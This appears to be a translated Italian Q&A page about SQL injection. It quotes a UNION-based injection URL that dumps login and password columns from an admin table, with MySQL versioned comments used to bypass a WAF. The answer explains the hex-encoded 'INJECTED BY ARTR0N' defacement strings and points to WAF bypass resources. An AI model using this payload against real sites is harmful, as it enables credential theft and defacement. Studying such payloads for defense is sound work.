http://www.example.com?id=-29/!50000UNION/ /!50000SELECT/ 1,2,0x3c68353e3c63656e7465723e494e4a45435445442042592041525452304e3c2f63656e7465723e3c2f68353e,4,5,0x494e4a45435445442042592041525452304e,7,8,9,10,11,12,13,14,15,16,17,18,/!50000UNHEX(HEX(GROUP_CONCAT(login,0x3a,senha)))/,0x494e4a45435445442042592041525452304e FROM administracao
Riguardo alla prima domanda:
0x494e4a45435445442042592041525452304e si traduce in "INJECTED BY ARTR0N"
0x3c68353e3c63656e7465723e494e4a45435445442042592041525452304e3c2f63656e7465723e3c2f68353e si traduce in <h5><center>INJECTED BY ARTR0N</center></h5> Per quanto riguarda la tua seconda domanda, controlla OWASP WAF Bypass e cerca "String to Hex Converter", otterrai quello che hai chiesto.
Leggi altre domande sui tag sql-injection mysql